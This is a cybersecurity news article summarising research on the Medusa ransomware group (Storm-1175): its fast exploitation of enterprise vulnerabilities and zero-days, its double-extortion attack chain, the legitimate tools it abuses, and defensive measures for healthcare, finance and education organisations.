The Medusa ransomware group, tracked by Microsoft as Storm-1175, has emerged as one of the most operationally aggressive ransomware actors currently active. Operating as a ransomware-as-a-service (RaaS) platform since June 2021, Medusa has compromised over 300 organizations in critical infrastructure sectors by February 2025 — and is accelerating. New research from Microsoft reveals the group is exploiting freshly disclosed vulnerabilities within a single day of public disclosure, and in some cases weaponizing zero-day flaws up to seven days before they are even publicly known.

Who Is Medusa Ransomware (Storm-1175)?

Medusa is a double-extortion ransomware operation, meaning its operators both encrypt victim data and exfiltrate it, threatening to publish stolen files if ransoms go unpaid. This dual pressure maximizes leverage against victims who might otherwise restore from backups. The group has demonstrated particular interest in high-value, downtime-sensitive sectors, including:

  • Healthcare organizations
  • Educational institutions
  • Professional services firms
  • Financial sector entities

Recent intrusions have been concentrated in Australia, the United Kingdom, and the United States, with healthcare organizations bearing a disproportionate share of the damage. Hospitals and insurers, already stretched thin with minimal downtime tolerance and chronic patching backlogs, are particularly vulnerable to a threat actor that can identify and exploit exposed assets faster than defenders can respond.

Alarmingly Fast Exploitation of Vulnerabilities

What distinguishes Medusa from many ransomware groups is its operational tempo. Microsoft's threat intelligence team observed Storm-1175 moving from initial access to post-compromise operations — including data exfiltration and ransomware execution — within a single day. In some intrusions, this entire attack chain was completed in a matter of hours.

Over the past three years, Medusa's operators have exploited at least 16 distinct vulnerabilities across widely deployed enterprise products, including:

  • Microsoft Exchange
  • Ivanti Connect Secure and Policy Secure
  • ConnectWise ScreenConnect
  • JetBrains TeamCity
  • SAP NetWeaver
  • CrushFTP and GoAnywhere MFT
  • SmarterMail and BeyondTrust
  • Papercut and SimpleHelp

The group was observed exploiting a critical SAP NetWeaver vulnerability just one day after its public disclosure on April 24, 2025 — a timeline that leaves virtually no window for defenders to patch before exploitation begins.

Zero-Day Exploitation: Attacking Before the World Knows

Perhaps the most alarming aspect of Microsoft's findings is Medusa's use of zero-day vulnerabilities. According to the report, Storm-1175 has exploited at least three confirmed zero-day flaws, including:

  • CVE-2026-23760 — a zero-day in SmarterMail
  • CVE-2025-10035 — a zero-day in GoAnywhere MFT

In some cases, the group exploited these flaws seven days before they were publicly disclosed. This suggests Storm-1175 either discovers vulnerabilities independently through its own research or has access to pre-disclosure intelligence — a capability typically associated with sophisticated nation-state actors rather than financially motivated cybercriminals.

The group has also targeted Linux systems, including Oracle WebLogic instances, and has chained multiple security defects together to achieve remote code execution (RCE) on victim systems.

The Attack Chain: From Foothold to Full Encryption in Hours

Once initial access is established — typically via phishing or vulnerability exploitation — Storm-1175 follows a rapid, well-rehearsed playbook:

  • Deploys a web shell or remote access payload to maintain persistence
  • Performs reconnaissance and lateral movement across the network
  • Modifies firewall rules to enable persistent remote access
  • Harvests and exfiltrates credentials, including from Veeam backup software
  • Executes file-encrypting ransomware across all reachable systems

Microsoft specifically noted that after obtaining administrator credentials, Storm-1175 uses a script to recover passwords stored in Veeam backup software. This allows the group to pivot to any remote hosts connected via Veeam, dramatically expanding the blast radius of the ransomware deployment.

Tools and Techniques: Living Off the Land

To evade detection and blend into legitimate administrative activity, Medusa's operators heavily rely on living-off-the-land binaries (LOLBins) — legitimate tools that are already present on most enterprise systems. The group's observed toolkit includes:

  • PowerShell and PsExec for remote execution
  • Cloudflare Tunnels to mask command-and-control traffic
  • Remote Desktop Protocol (RDP) and various RMM tools for lateral movement
  • PDQ Deployer for payload distribution
  • Impacket and Mimikatz for credential harvesting
  • Bandizip and Rclone for data staging and exfiltration

This reliance on dual-use tools makes behavioral detection difficult and highlights the need for anomaly-based monitoring rather than signature-only defenses.

The Double-Extortion Threat Beyond Ransomware

"If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime — it's the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data."

— Pete Luban, Field CISO, AttackIQ

Organizations in regulated industries like healthcare and finance face a compounded risk: not only operational disruption from encryption, but the potential for HIPAA violations, GDPR fines, and reputational damage if stolen patient or financial records are leaked publicly. Medusa has demonstrated a willingness to follow through on these threats, making negotiation and recovery far more complex than a traditional ransomware scenario.

How Organizations Can Defend Against Medusa

Given Storm-1175's speed and sophistication, defenders need to operate proactively rather than reactively. Security experts recommend the following measures:

  • Continuous asset inventory: Maintain an up-to-date map of all internal and external-facing systems, especially those exposed to the internet.
  • Aggressive patch cadence: Prioritize patching for internet-facing systems and subscribe to threat intelligence feeds to detect zero-day exploitation attempts early.
  • Credential hygiene: Audit backup software configurations, including Veeam, to ensure stored credentials cannot be easily harvested.
  • Network segmentation: Limit lateral movement by segmenting critical systems and enforcing least-privilege access controls.
  • Behavioral monitoring: Deploy EDR and SIEM solutions tuned to detect LOLBin abuse, unusual RDP sessions, and anomalous Rclone or PowerShell activity.
  • Incident response readiness: Ensure IR plans are tested and that offline, immutable backups exist that cannot be reached via Veeam or similar backup platforms.

Conclusion

Medusa ransomware represents a new tier of financially motivated threat actor — one that combines nation-state-level vulnerability research with an industrialized RaaS delivery model. The group's ability to exploit zero-days before public disclosure, compress the attack timeline to a matter of hours, and specifically target organizations least able to absorb disruption makes it a critical threat for 2025 and beyond. Organizations in healthcare, finance, and education must treat perimeter exposure as an emergency, invest in proactive threat hunting, and assume that patching windows are measured in hours, not weeks. Against Storm-1175, there is no such thing as a comfortable patch cycle.